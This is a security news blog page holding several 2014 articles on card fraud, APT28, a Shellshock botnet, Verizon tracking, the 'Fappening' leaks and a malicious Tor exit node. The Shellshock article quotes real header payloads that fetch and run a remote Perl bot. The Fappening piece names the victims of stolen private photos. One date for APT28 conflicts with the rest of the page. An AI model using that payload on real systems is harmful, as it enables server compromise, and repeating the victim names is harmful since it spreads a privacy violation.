Skip to content
Oct 30 14

Voxis, the platform for automating rogue credit card charges is available in the underground

by Pierluigi Paganini

A group of cybercriminals is proposing in the underground an application for automating rogue credit card charges dubbed Voxis platform.

The cyber criminal ecosystem has a new tool in its arsenal called Voxis, the Voxis Platform is a payment gateway application which can send batches of stolen card charges to multiple gateway processors automating their returns before acquiring banks can catch any illegal activity. The discovery was made by experts at IntelCrawler, cyber threat intelligence firm from Los Angeles, which has uncovered a criminal group called “Voxis Team” which specializes in money laundering and had developed the application for this specific purpose.

“IntelCrawler, cyber threat intelligence firm from Los Angeles, has identified an active organized crime group called «Voxis Team», which  specializes in money laundering by using their own specially designed payment gateway software which can send batches of stolen card charges to muliple gateway processors, automating their returns before acquiring banks can catch the merchant fraud. ” states te blog post from IntelCrawler.

Voxis ad

The Voxis Team is advertising its Web-based application on underground forums, the gang is proposing it as a tool for cashing out money from stolen credit cards by automating fraudulent purchases.

This kind of applications are in demand by the market especially in this moment because the large payment card data breaches at U.S. retailers like Target and Home Depot have flooded the underground market with stolen credit card data that criminals desire to quickly monetize.

Voxis 2

Tha Voxis Platform is an excellent instrument to emulate the human behavior and avoid the detection of anti-fraud systems the are triggered when specific fraud patterns are recognized.  In every online transaction we distinguish the following roles the buyer, the seller and the payment gateway. The seller will receive money from transactions if it has a merchant account registered with the payment gateway.

“… ,bad actors can use speed to automate and load cards to be charged for pre determined amounts at predetermined times, all with the goal of sliding under fraud detection systems. The emulation of human behaivior and buying patterns increases their probabilities of having charges authorised.” states the post published by IntelCrawler.

“The black market has money mules and stolen identities which allows bad actors the necessary resources to open merchant accounts. They can easily build fake web sites and turn in stolen documents to get approved merchant accounts. The issue for them has always been hammering the merchant accounts with stolen cards before the account gets cut off.”

The tactic adopted by crocks is consolidated, cybercriminals can gain access to merchant accounts or open rogue ones by setting up dummy e-commerce sites and using fake identity documents or money mules. As explained by InterCrawler, the principal problem for the criminals is time, they have to complete the highest possible number of fraudulent charges before they’re detected and their merchant accounts get closed.

Voxis Platform allows to speed up this process, criminals using it can make the highest possible number of fraudulent charges, on specialized forum the Voxis team claims that the software supports 32 different payment gateways and it has been designed to emulate human interaction “to make it look like real humans are sending their credit card information to the payment gateways.”

Voxis ad supported gateway

«Voxis Team» appeared on the blackmarket in August 2014, having its own group of developers, one of interesting features implemented by the Voxis team is an automated filling of missing information in regard of credit card holder, the functionality is implemented using people search service

E-commerce websites and payment gateway operators must revise their merchant account verification process and improve fraud-detection methods to respond the increasing sophistication of tactics adopted by criminals.

ce websites and payment gateway operators must revise their merchant account verification process and improve fraud-detection methods to respond the increasing sophistication of tactics adoped by criminals.

Pierluigi Paganini

Security Affairs –  (Voxis platform, cybercrime)

Oct 30 14

Hackers infiltrated a White House unclassified computer network

by Pierluigi Paganini
white house historypg

According to an unnamed official at the White House, hackers infiltrated an unclassified network.The Obama Administration has confirmed the incident.

An embarrassing incident involved the computer systems of the Obama Administration, according to the media an unclassified computer network used by the US government was infiltrated by hackers.

The New York Times reported that an unnamed official working at the White House has admitted systems used by President Obama’s staff were breached by external hackers. The intrusion was detected by defense systems and triggered a temporary system outages.

The system outages was caused “as a result of measures we have taken to defend our network,” said the official.

According the experts the hacker was engaged in reconnaissance, there is no evidence of data breach, neither of sabotage. The attacker was trying to discover the composition of the  unclassified White House network.

“Administration officials said the attack did not appear to be aimed at destruction of either data or hardware, or to take over other systems at the White House. That strongly suggests that the hackers’ intention was either to probe and map the unclassified White House system, find entry points where they connect to other system or conduct fairly standard espionage.” reported The New York Times.

The Washington Post speculated that Russian hackers may have coordinated the intrusion in the unclassified network of the White House, the thesis is supported by the results of recent investigations on espionage campaigns on a large scales, which uncovered hacking campaigns operated by Russian hackers, probably linked to the Kremlin.

White House

“The Russian intelligence service was believed to have been behind a breach of the U.S. military’s classified networks, which was discovered in 2008. ” reported the Washington Post.

Recently security firm iSight issued a report in an APT group dubbed “Sandworm” team that was running a cyber espionage campaign on NATO and other Government entities, including the European Union, the Ukraine.

Yesterday security firm FireEye reported of another ATP group, dubbed APT28, which seems to be linked to the Russian government and that is active since 2007. APT28 run a cyberespionage campaign against governments, militaries and security companies worldwide.

The White House official said:

“Certainly a variety of actors find our networks to be attractive targets and seek access to sensitive information. We are still assessing the activity of concern.” White House officials said.

“On a regular basis, there are bad actors out there who are attempting to achieve intrusions into our system,” said a second White House official. “This is a constant battle for the government and our sensitive government computer systems, so it’s always a concern for us that individuals are trying to compromise systems and get access to our networks.”

Secret Service, National Security Agency and the FBI are investigating the security breach.

Pierluigi Paganini

Security Affairs –  (White House, cyber espionage)

Oct 29 14

Sony Xperia Smartphones send user data in China

by Pierluigi Paganini

Security experts have discovered that Sony Xperia Smartphones secretly send user Data to servers in China due to the presence of the Baidu spyware.

Sony Xperia Devices secretly send user data to servers in China, this is the last news that is shocking the mobile industry and that was published on several forums. The problem relates to Sony devices running the Android 4.4.2 or 4.4.4 KitKat version, it seems that the anomalous behavior is observable even if the users haven’t installed any application on the Smartphone.

The news is disconcerting and it seems that some new Sony Xperia Smarphone contain the Baidu spyware. A few weeks ago a group of users belonging to an online community of Sony Xperia Smarphone owners, discovered the presence of a folder, named “Baidu” on their devices, that was created without the owner’s permission.

Due to the presence of the folder it is very easy for the users to verify in the Baidu spyware has infected their device.

Another worrying aspect is that users aren’t authorized to delete it from their Sony Xperia Smarphone, once they try to remove it, it instantly reappears. Users are not able to delete the Baidu folder even if the user tries the same procedure starting the phone in Safe Mode.

“Just unpacked my Sony Z3 compact, haven’t installed a single app and its connecting to China. I am not so concerned about the folder itself but my phone now has a constant connection to an IP address in Beijing, which I am not too happy about.” is the comment of a  Sony Xperia Smarphone user published on a Reddit discussion on the topic.

According the reports circulating online the new Sony Xperia Z3 and Z3 Compact are affected by the problem, but many other users detected the folder on their devices, not only Sony Smartphone. The owners of an HTC One M7, an HTC One X and a few users using the OnePlus One have discovered the presence of the Baidu malware.

As reported by the colleagues at TheHackerNews, the mysterious Baidu folder appears to be created by Sony’s “my Xperia” service every time the handset establishes a connection and it is reported to be sending pings to China.

China spy Sony Xperia Smartphone data baidu malware

Many users reported they found that the Chinese government is able to control the spyware to gain access to the user’s device exactly in the same way any RAT does, in particular a users with the nickname Elbird has posted on different Sony Forums that the Baidu malware allows the Chinese Government to perform the following actions

  • Read status and identity of your device
  • Make pictures and videos without your knowledge
  • Get your exact location
  • Read the contents of your USB memory
  • Read or edit accounts
  • Change security settings
  • Completely manage your network access
  • Couple with bluetooth devices
  • Know what apps you are using
  • Prevent your device from entering sleep mode
  • Change audio settings
  • Change system settings

The Sony Xperia case arrives a few days after the news that Chinese smartphone manufacturer Xiaomi was involved in a similar issue, experts sustain that the company is spying on personal user data. A few months ago, experts at F-Secure collected evidences that Xiaomi Smartphones were sending user data back to the servers based in China.

Sony still hasn’t officially commented the case, despite it has  admitted the issue announcing the release of a fix.

Below the instructions to remove the Baidu Spyware from the device.

  1. Backup your data and factory reset the device.
  2. Go to Settings -> Apps -> Running and Force stop bothMyXperia” apps.
  3. Remove the Baidu folder using KommanderFile app.
  4. Go to Settings -> About Phone -> Click 7 times on the Build Number to enable developer mode.
  5. Download or Install the Android SDK on your computer and then connect the Sony device to it using USB cable.
  6. Run the adb tool terminal : adb shell 
  7. In adb shell, type the command: pm block
  8. Exit adb shell
  9. Reboot the device.

Pierluigi Paganini

Security Affairs –  (Sony Xperia Smartphones, mobile malware)

Oct 29 14

APT28: FireEye uncovered a Russian cyber espionage campaign

by Pierluigi Paganini
APT28 report

APT28: FireEye has issued a new report uncovering a large scale cyber-espionage campaign that appears sponsored by the Russian government.

A report published by FireEye reveals that a group of Russian hackers, dubbed APT28, is behind long-running cyber espionage campaigns that targeted US defense contractors, European security organizations and Eastern European government entities.

The hackers also targeted attendees of European defense exhibitions, including the EuroNaval 2014, EUROSATORY 2014, and the Counter Terror Expo and the Farnborough Airshow 2014.

Recently, principal security firms (Cisco, FireEye, F-Secure, iSight Partners, Microsoft, Tenable and others) were involved in a joint effort dubbed Operation SMN against the cyber espionage group known as Hidden Lynx and its arsenal.

Table for APT28

FireEye researchers collected evidences that the APT28 group is linked to the Russian Government, the team of hackers “does not appear to conduct widespread intellectual property theft for economic gain, but instead is focused on collecting intelligence that would be most useful to a government.”

“APT28 appeared to target individuals affiliated with European security organizations and global multilateral institutions. The Russian government has long cited European security organizations like NATO and the OSCE as existential threats, particularly during periods of increased tension in Europe,” FireEye reported.”

APT28 is active since 2017 and it has targeted governments, militaries, and security organizations. The group focused its hacking campaign on targets that would be of interest to Russia, such as the Caucasus region with a focus on Georgia.

“Despite rumors of the Russian government’s alleged involvement in high-profile government and military cyber-attacks, there has been little hard evidence of any link to cyberespionage,” said Dan McWhorter, FireEye vice president of threat intelligence. “FireEye’s latest advance persistent threat report sheds light on cyberespionage operations that we assess to be most likely sponsored by the Russian government, long believed to be a leader among major nations in performing sophisticated network attacks.”

The majority of the files analyzed by experts at FireEye were set to Russian language settings, this circumstance suggests “that a significant portion of APT28 malware was compiled in a Russian-language build environment consistently over the course of six years.”

Also timing related to the malware design suggest the involvement of a Russia-based team, nearly 96 percent of the malware was compiled between a Monday and Friday during an 8 AM to 6 PM work day in the Moscow time zone.

The APT28 used spear phishing emails to trick victims into to open the infected file or to serve a malicious link.

APT28 report 2

The APT28 group has used for his hacking campaigns numerous common tools, including a downloader called Sourface (aka Sofacy), the backdoor Eviltoss and the modular implant known as Chopstick.

Sofacy was also used in the cyber espionage campaign dubbed “Operation Pawn Storm” recently uncovered by TrendMicro, which targeted military, government and media organizations worldwide.In particular, Chopstick caught the attention of researchers because it “demonstrate formal coding practices indicative of methodical, diligent programmers. Chopstick is a modular agent that appears very flexible and according the experts it is designed for long-term use and versatility. In the report the experts analyzed two different instances of CHOPSTICK containing “vastly different functionality”, depending on modules the authors included in the malicious agent.

Backdoor Eviltoss use asymmetric encryption to encrypt syphoned data from victims, and some sample detected by the experts also use SMTP to transfer stolen data outside the organization.

“APT28 is most likely supported by a group of developers creating tools intended for long-term use and versatility, who make an effort to obfuscate their activity,” it wrote. “This suggests that APT28 receives direct ongoing financial and other resources from a well-established organization, most likely a nation state government.”

Let me invite you to read the excellent report that could be downloaded here:

Pierluigi Paganini

Security Affairs –  (APT28, cyber espionage)

Oct 28 14

Experts at SANS discovered a Shellshock SMTP Botnet Campaign

by Pierluigi Paganini
shellshock bashbug

The experts at SANS Internet Storm Center experts discovered a a new Shellshock Botnet campaign that is targeting SMTP gateways worldwide.

A new wave of attacks exploiting the ShellShock flaw is targeting the SMTP servers worldwide, according to a post published by the  SANS Internet Storm Center. The SANS explained that the payload is an IRC Perl bot with simple DDoS commands that could be used to fetch and execute additional malicious code.

The new Shellshock campaign is targeting SMTP gateways, searching for vulnerable MTAs / MDAs, the attackers use to hide the malicious code into the message’s headers.

The attackers are including the following code in several message fields, including the “To:” field, “From:” field, “Subject” field, “Date:” field, “Message ID:” and others.

Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

The Shellshock vulnerability is continuing to create problems more than a month after it was publicly disclosed, threat actors are exploiting the BashBug vulnerability to serve a malicious a perl script onto targeted machines.

The script is used by attackers to recruit the computer in a botnet that receives is controlled over IRC, said a post on the Binary Defense Systems website.

“The attack leverages Shellshock as a main attack vector through the subject, body, to, from fields,” is reported on the Binary Defense Systems website. “Once compromised, a perl botnet is activated and beaconing on IRC for further instructions.” 

In the following image is reported the original email used in the attacks and containing the initial ShellShock payload:

ShellShock perl_code_botnet_1

“It’s unknown which product would specifically be vulnerable to this since Shellshock relies on system level calls and leveraging bash however it seems to be a fairly wide-scale delivery of emails across the United States,” BDS added.

Security experts have detected numerous attacks worldwide that were exploiting the Shellshock flaw, including attacks against VOIP systems and campaign to spread the malware like the Mayhem botnet.

A honeypot run by experts at AlienVault Labs has detected two separate strains of malware attempting to exploit the ShellShock vulnerability just 24 hours of the disclosure.

In September, security experts at researchers at FireEye published details on several proof-of-concept scripts which exploit the Shellshock bug.

“We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise,” FireEye wrote.

As explained many times, many hidden functions on Linux/Unix-based systems could be affected because they may invoke the flawed Bash, it is quite complex to patch the overall amount of the vulnerable machine in a short time, and cyber criminals know this.

The situation is particularly critical for the Internet of Thinks devices, for which in many cases isn’t available an upgrade or it is impossible to apply any update.

Pierluigi Paganini

Security Affairs –  (Shellshock , SMTP)

Oct 28 14

Verizon Wireless tracks its clients with the UIDH technology

by Pierluigi Paganini
Verizon Wireless UIDH 2

Verizon Wireless injects UIDH headers to every user’s Web request to track its web experience including visited websites and his habits.

Verizon Wireless, the greatest US Telecom operator is tracking the internet traffic of its mobile users by adding a token to Web requests. The token is used by the company for advertising purpose, Verizon tracks the user’s habits, even if he had opted out of their Customer Proprietary Network Information (CPNI) options.

Customer proprietary network information (CPNI) is the  information collected by telecommunications carrier about a user’s calls, including call data and any information that appears on the consumer’s telephone bill.

It seems that the practice has been going on for two years when the company launched the Unique Identifier Token Header (UIDH) under its Relevant Mobile Advertising program.

The Verizon network is adding the X-UIDH header tokens to the requests traveling over its network, every header has a unique identifier associated to each mobile device.

The UIDH allows Verizon to track customer web experience, including visited website and mobile apps used. The solution implemented by Verizon is called the PrecisionID and allows the company to profile users and its interests to tailor advertisements, according to internal documentation.

Verizon uses a different UIDH value each week, the data used by advertisers includes the subscribers’ postal address, device types and language preferences, gender, age, hobby and personal interests.

“In addition, we will use an anonymous, unique identifier we create when you register on our websites. This may allow an advertiser to use information they have about your visits to online websites to deliver marketing messages to mobile devices on our network,” explain Verizon on its website. “We do not share information that identifies you personally outside of Verizon as part of this program. [Some of this information was] obtained from other companies.

Verizon Wireless UIDH

“Verizon is rewriting your HTTP requests to insert a permacookie? Terrible,” tweeted  Jacob Hoffman-Andrews, a senior staff technologist with the Electronic Frontier Foundation

The alarming issues is that there is no way for Verizon users to stay out of the company radar, even if they enable privacy mode navigation, use a new handset or enable Verizon privacy settings.

“Verizon responded that while the UIDH is still in the queries, consumers who have opted out of the program will no longer have information associated with the identifier. The company did not, however, pledge to stop updating the user’s profile.” reported Robert Lemos from ArsTechnica.

The unique way for Verizon users to avoid company tracking activity is to use full encryption solution like VPN (i.e. Tunnelbear or TOR).

Pierluigi Paganini

Security Affairs –  (Verizon UIDH , privacy)

Oct 27 14

The Fappening part 6 is out … a boring saga

by Pierluigi Paganini
the fappening

The part 6 of the Fappening archive is online, it includes image of Nicola Peltz, Krysten Ritter, Angie Miller, Aubrey Cleland and Tobie Perciva.

The effects of the Fappening, aka the iCloud Hack, are still evident in the cyberspace. Relentless hackers have released over the weekend a new archive, it is the part 6 of the overall Fappening case, that includes the images of other five Hollywood celebrities.

According to the news reported in the Internet, the hackers have tried to  persuade the image hosting site Imgrobot to publish the leaked images of the Fappening saga, after that the managers of the website have removed all photos fearing copyright violation lawsuits from the Hollywood celebrities.

The Fappening 6 archive includes the images of Nicola Peltz, Bradley Martin in the A&E series Bates Motel, Tessa Yeager actress in the Transformers : Age of Extinction movie and of the actress and msician Krysten Ritter. The new archive of the Fappening collection includes also pictures of celebrities not involved in previous leaks, including American Idol finalist Angie Miller, Aubrey Cleland and Tobie Percival.

The Fappening 6 Tessa_Yeager

Also in this case the pictures seem to have the same origin of the photos included in the archives released under the Fappening Umbrella, they all come from iCloud accounts that were hacked by criminals.

Sergei Kholodovskii, a 28 year old Russian is the owner of iCloud Hacks leaked images website that anyway declared that he isn’t involved in the data theft, his role is just to act as a facilitator for the diffusion of the Fappening Archives.

“All the photos on our website were taken from open sources, no individual’s privacy was violated,” said Sergei Kholodovskii. Kholodovskii published on his website a disclaimer to specify its position, and explained that will host more photos is they were available on the Internet.

Summing up the various episodes of the Fappening case, let me remind you that the Part 5 of iCloud Hacks leaks were posted online a couple of weeks ago.

The Fappening 5 included the images of another 7 Hollywood celebrities,  model Allegra Carpenter, Kaime O’Teter, British actress, Lauren O’Neil, TV star, Lindsay Clubine, Miss Virginia USA, 2013, Shannon McAnally, Wailana Geisen and Nina Stavris.

Who will be next?

Pierluigi Paganini

Security Affairs –  (The Fappening, data leakage)

Oct 27 14

Backoff infections rise up to 57 percent increase in Q3

by Pierluigi Paganini
Backoff malware 2

Security firm Damballa issued the ‘State of Infections Report Q3 2014′ that highlights a 57% increase in infections of the notorious Backoff POS malware.

Security experts at Damballa security firm detected a 57% increase in infections of the popular Backoff malware in the third quarter, the number of infections was jumped high from August to September and in this last month Backoff infections increased 27%.

The situation is very worrying, law enforcement fears an explosion of the number of infections worldwide, the US Secret Service estimated that as many as 1,000 US businesses may be compromised by Backoff malware. The malicious code was already used against major companies including UPS and Dairy Queen. This summer the US-CERT warned that threat actors were using remote desktop tools such as LogMeIn, Splashtop 2 and Apple Remote Desktop to deploy the PoS malware and syphon data.

The experts are concerned by the by the evasion techniques implemented by the author of the malware and by the lack of security measure implemented in many environments compromised by the malicious code.

“The increase is notable as it highlights that the malware had bypassed network prevention controls and was active, yet hidden, in the network.” states the official announcement from Damballa.

Many PoS systems targeted by the malware are exposed on the Internet for maintenance purpose, this enlarge their surface of attack exposing them to further risks.

“In many cases, the PoS systems are free-standing from the corporate network,” says Damballa CTO Brian Foster. “They connect to local networks, which have limited security. Without this visibility, it’s impossible to discover the device is communicating with criminal command and control.”

Backoff malware

The report, one again highlight the urgency to assume a correct security posture, especially in those industries more impacted by the criminal activity like the retail sector. Companies must be aware of the cyber threats and about the TTPs (techniques, tactics and procedures) adopted by bad actors.

Companies fail to secure outbound network connections and encrypt PoS data, most POS malware, including BackOff malicious code, are advanced threats that allows bad actors to be persistent and undercover for a long time. Backoff, like many other POS malware,  is able to bypass prevention controls like anti-virus, IPS and firewalls that are adopted by almost every company.

” In a quick test performed in Damballa’s lab, a researcher tested Sinowal, a common malware file, and found that 45 of 55 antivirus products identified it as malware. Next, he created a new malware file by binding Sinowal to a Windows Help program file. He retested the new file and it was only detected by one of the 55 anti-virus products. The entire process of altering the malware file took less than two minutes.If the file had been opened by an unsuspecting end-user, the Windows Help file would have executed and in the background the malware file would have infected the device.”  states the report issued by Damballa.

POS malware is very insidious, attackers are using “constantly morphing malware because binaries change on a daily basis”, this means that malware is able to evolve over the time making hard its detection through continuous updates and repackaging activity.

Backoff malware 3

Signature-based prevention is ineffective, threat intelligence analysis is the unique way to mitigate these threats.

Pierluigi Paganini

Security Affairs –  (Backoff, POS Malware)

Oct 27 14

RRVS, Facebook and Yahoo work to prevent identity theft

by Pierluigi Paganini
RRVS Require-Recipient-Valid-Since facebook yahoo_email

Facebook and Yahoo have designed an SMTP extension dubbed RRVS, Require-Recipient-Valid-Since, to prevent illegal use of emails with a new  ownership.

Last year Yahoo announced the decision to reset any account that has not been used for 12 months, making them available to other users. The decision has raised several doubts for security and privacy issues, the policy chosen by Yahoo could expose users to the risk of for identity theft, let’s imagine for example that a user share the same Yahoo email with other web services, the new owner of the account could impersonate the old one and request a password reset to gain access to all the services linked to that email (i.e. Facebook).

Facebook confirmed that its concern about the security of its account linked to a recycled Yahoo account that could be taken over by a recycled Yahoo email address.

RRVS Require-Recipient-Valid-Since facebook yahoo_email 2

Yahoo and Facebook have worked together to overwhelm the problem, their engineers have developed an SMTP extension dubbed Require-Recipient-Valid-Since (RRVS) which inserts a timestamp in the header of an email message. The timestamp is used to indicate when Facebook last confirmed ownership of the Yahoo account.

“If the account changed hands since our last confirmation, Yahoo can just drop the message, preventing delivery of sensitive messages to the wrong hands.”

“If the account changed hands since our last confirmation, Yahoo can just drop the message, preventing delivery of sensitive messages to the wrong hands,” explained Murray Kucherawy, a software engineer at Facebook.

Facebook on Thursday announced the RRVS Request for Comments draft RFC7293 was approved as a Proposed Standard by the IETF.

“The intended use of these facilities is on automatically generated messages, such as account statements or password-change instructions, that might contain sensitive information, though it may also be useful in other applications,” states the draft.

Using the RRVS extension, the sender is able to discriminate the recipient at a certain point-in-time.

“A receiving system can compare this information against the point in time at which the address was assigned to its current user,” the draft says. “If the assignment was made later than the point in time indicated in the message, there is a good chance the current user of the address is not the correct recipient. The receiving system can then prevent delivery and, preferably, notify the original sender of the problem.”

A few days ago, Facebook announced to gave developed a tool that mines paste sites such as Pastebin and Github searching for stolen credentials  belonging to Facebook accounts. The company is aware of the value of the accounts in the criminal underground and how crooks used them for illicit activities, and recent activities, including the RRVS, are its response to prevent any abuse.

Pierluigi Paganini

Security Affairs –  (RRVS, identity theft, Require-Recipient-Valid-Since)

Oct 27 14

Russian Tor exit node patches with malware the files downloaded

by Pierluigi Paganini
Tor exit node attack 1

The researcher Josh Pitts of Leviathan Security Group identified a Russian Tor exit node that is patching the binaries downloaded by the users with malware.

Once again Tor network is under attack, the researcher Josh Pitts of Leviathan Security Group has identified a Tor exit node that was used to patch the binaries downloaded by the users, the threat actors were adding malware to the files dynamically.

The Tor is a system that allows to anonymize users’ online experience, but as explained many times this is possible under specific conditions because the manipulation of scripts running on visited website or file downloaded from an untrusted repository could reveal Tor user’s identity.

In this case we are faced with the danger of trusting files downloaded from unknown sources, but let’s consider anyway that an attacker could also use a similar technique compromising a legitimate website, and that compromising/setting an exit node to make the “dirty job” is always possible.

Many binaries are hosted without any transport layer security encryption, only in some cases it is possible to find signed files to prevent on-fly modification.

To mitigate suck kind of attacks encrypted download channels represents the best option  to avoid manipulation of the binaries.

“SSL/TLSis the only way to prevent this from happening. End-users may want to consider installing HTTPS Everywhere or similar plugins for their browser to help ensure their traffic is always encrypted,” said Pitts.

Pitts discovered the anomalous behavior of the Tor exit node while conducting a research on download servers that could be abused to patch binaries during download through a man-in-the middle attack.

“After creating and using a new exitmap module, I found downloaded binaries being patched through a Tor exit node in Russia. ” said Pitts in the blog post.

During that DerbyCon conference the researcher has presented how to run a MITM patching of binaries during download using BDFProxy. The Backdoor Factory framework (BDF) designed by the researcher allows him to patch executable binaries with shell code that the attacker could use to execute an arbitrary code without the user noticing any suspicious activity.

Unfortunately, this attack could be conducted by anyone on the Internet, and as demonstrated by Pitts, it could be effective to hack Tor anonymity controlling one or more exit nodes.

Internet users, consciously or not, download every day an impressive number of files, let’s think for example to software upgrades. If an attacker is able to control the download process for security updates he can infect a large number of machines simply injecting malware into the update channel.

The update process is considered the most scaring scenario by security experts, because the download file in many cases is considered trusted by default. The attack chain could also be improved using a digital signature mechanism which abuses of fake digital certificates.

Legitimate software vendors use to sign their binaries, any modification to the code will cause verification errors. This is the scenario observed by the research during his tests, an attacker running a MITM attack while the user is downloading a file can actively patch binaries with his own code.

“I tested BDFProxy against a number of binaries and update processes, including Microsoft Windows Automatic updates.  The good news is that if an entity is actively patching Windows PE files for Windows Update, the update verification process detects it, and you will receive error code 0×80200053.” states Pitts.

Tor exit node attack

The expert extended its analysis to Tor exit nodes discovering that a malicious node in Russia was actively patching any binaries he downloaded with a piece of malware. Fortunately, in time I’m writing the Tor exit node is the unique one running the attack.

“To have the best chance of catching modified binaries in transit over the Internet, I needed as many exit points in as many countries as possible. Using Tor would give me this access, and thus the greatest chance of finding someone conducting this malicious MITM patching activity,” Pitts wrote.

“After researching the available tools, I settled on exitmapExitmap is Python-based and allows one to write modules to check exit nodes for various modifications of traffic.  Exitmap is the result of a research project called Spoiled Onions that was completed by both the PriSec group at Karlstad University and SBA Research in Austria. I wrote a module for exitmap, named, and have submitted a pull request to the official GitHub repository. Soon after building my module, I let exitmap run.  It did not take long, about an hour, to catch my first malicious exit node.”

Pitts downloaded several legitimate binaries from trusted sources, including, and each of them came loaded with malware code that opens a port to listen for commands and starts sending HTTP requests to a C&C server.

The researcher informed officials of the Tor Project, who flagged the Tor exit node as bad.

“We’ve now set the BadExit flag on this relay, so others won’t accidentally run across it. We certainly do need more people thinking about more modules for the exitmap scanner. In general, it seems like a tough arms race to play,” wrote Roger Dingeldine, one of the original developers of Tor. 

The attack scenario described by Pitts is very common, user should be wary of the repository referenced for software download, making sure that they are using encrypted channels (TLS/SSL)

“The problem of modified binaries is not limited to Tor. We highlight the example because of some of the misconceptions people have about Tor providing increased safety. In general, users should be wary of where they download software and ensure they are using TLS/SSL. Sites not supporting TLS/SSL should be persuaded to do so,” Pitts said.

Pierluigi Paganini

Security Affairs –  (Tor exit nodes, hacking)